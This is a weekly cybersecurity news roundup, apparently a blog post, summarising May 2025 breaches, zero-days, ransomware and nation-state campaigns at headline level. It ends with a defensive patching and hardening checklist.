Top Cybersecurity News Weekly Summary – Week of May 12th, 2025

From billion-dollar market hacks to steel mills gone dark—why this week proved (again) that cyber is the heartbeat of global business

May 16, 2025

Happy Friday, Security Gang!

If Patch Tuesday felt like a heavyweight bout, the rest of the week came in swinging with body blows to every sector that keeps our economy humming. We watched Tokyo’s brokerage accounts get hijacked for $2 billion, Chinese operators burrow into the drone supply chain, and America’s largest steelmaker hit the kill switch on its furnaces—all before I could finish my second espresso.

Add in fresh zero-days from Microsoft and Fortinet, a record-shattering privacy verdict in Texas, and ransomware still starving U.K. grocery shelves, and you’ve got a masterclass in how digital risk translates straight to boardroom panic (and supply-chain chaos). Grab your coffee, buckle up, and let’s dissect the week’s lessons so you can walk into Monday’s stand-ups armed with action—not anxiety. Coffee-cup cheers, y’all.

Below, the stories are grouped by theme so you can scan what matters, share with leadership, and tighten defenses before Monday’s inbox flood.

Financial Systems & Market Manipulation

• Japanese brokerage raid — $2 B in fake trades: 5,000 accounts were looted using stolen creds, then used to pump thinly-traded Chinese equities. The FSA quietly removed references to China, hinting at diplomatic pressure and a widening probe.

Software Supply-Chain & Developer Risk

• Malicious NPMs target Cursor AI fans: Three packages (sw-cur*, aiide-cur) still live on NPM swap binaries and phone home, giving attackers RCE inside dev environments. >3,200 installs prove how “cheap AI access” lures engineers.
• Fake “AI tool” sites spread Noodlophile stealer: Viral Facebook ads push a polished installer that siphons cookies, wallets, and cloud tokens—no phishing email required.

Enterprise Apps & Patching Pressure

• SAP NetWeaver Visual Composer zero-day: CVE-2025-31324 (CVSS 10) plus a new deserialisation bug are feeding both ransomware gangs and China’s “Chaya” APT. 200+ servers still exposed.
• Microsoft drops 70 fixes, 5 in-the-wild zero-days: Four privilege-escalation flaws in CLFS/AFD/DWM and a scripting-engine RCE can be chained for full takeover.
• Fortinet FortiVoice RCE, Ivanti EPMM double zero-day, Adobe’s 39-patch mega-rollout, VMware Tools file-tamper bug, ASUS DriverHub RCE, Chrome 136 fixes: A reminder that “Patch Tuesday” now lasts all week.

Infrastructure & Manufacturing Disruption

• Nucor Steel shuts mills: IT breach forced a full stop at America’s biggest steel producer; ERP is tightly meshed with furnace controls.
• Nova Scotia Power breach: Attackers stole unencrypted bank-account data and consumption records—billing PII is still living in legacy systems.
• Co-op UK stores still half-empty: Five weeks after DragonForce ransomware, only 20 % of normal stock is shipping; critics blast weak continuity planning.

Retail, Education & Media

• Scattered Spider lands in U.S. retail: Google TAG says the SIM-swap masters behind Marks & Spencer and Harrods hits are now probing American chains.
• iClicker & Click-Fix evolution: Fake CAPTCHA tricked students into pasting PowerShell/Bash; APT-36 now serves Linux payloads too.
• Lee Enterprises: $2 M in recovery costs: February ransomware stalled billing for 70 newspapers, proving even short outages bleed cash.

Healthcare & Privacy

• Ascension vendor leaks 437 k patient files: Another MOVEit-linked supply-chain wound highlights why HIPAA risk now hides in third-party portals.
• Texas wins $1.375 B privacy settlement against Google: Record payout over clandestine location and biometric tracking raises the enforcement bar for every state AG.

Law-Enforcement & Botnet Takedowns

• 5Socks proxy empire dismantled: A 20-year-old Russian-run botnet renting 7,000 proxies for $10/month is finally offline; only 10 % of its malware ever triggered AV alerts.

Geopolitics & Nation-State Ops

• Earth Ammit hits drone supply chain: Chinese actor compromised Taiwanese/S. Korean vendors, planting backdoors that could jump to defense and satellite customers.
• Bulgaria-based GRU spy ring sentenced: 50 years cumulative—for hirelings surveilling Ukrainian troop sites and European dissidents—shows Moscow’s growing use of freelance assets.
• Poland boots Russia’s Kraków consulate: Warsaw blames Kremlin operatives for mall arson, underlining the fusion of physical sabotage and cyber operations.

📌 Fast Action Checklist

Enforce phishing-resistant MFA on brokerage, retail, and ERP portals to kill credential replay.
Block malicious NPM names (sw-cur*, aiide-cur) and scan dev endpoints for replaced binaries.
Patch SAP CVE-2025-31324 now; restrict or disable Visual Composer uploader until fully remediated.
Deploy Microsoft, Fortinet, Ivanti, Adobe, Chrome & ASUS fixes in that order—zero-days first.
Hunt for CLFS/AFD privilege-escalation traces in EDR and domain-controller logs.
Segment IT/OT networks; rehearse “pull-the-plug” drills like Nucor’s to prevent unsafe plant shutdowns.
Audit proxy traffic for leftover 5Socks IOCs; block unusual TCP/443 exits from non-proxy hosts.
Educate staff on Click-Fix and fake AI lures; disable clipboard-paste from untrusted sites in browsers.
Tokenise or encrypt any banking fields in utility, retail and healthcare billing systems—PCI standards apply.
Review cyber-insurance terms; ensure ransom payments don’t violate local “no-pay” or OFAC rules and that continuity plans cover offline billing.

Stay cyber safe, Security Gang!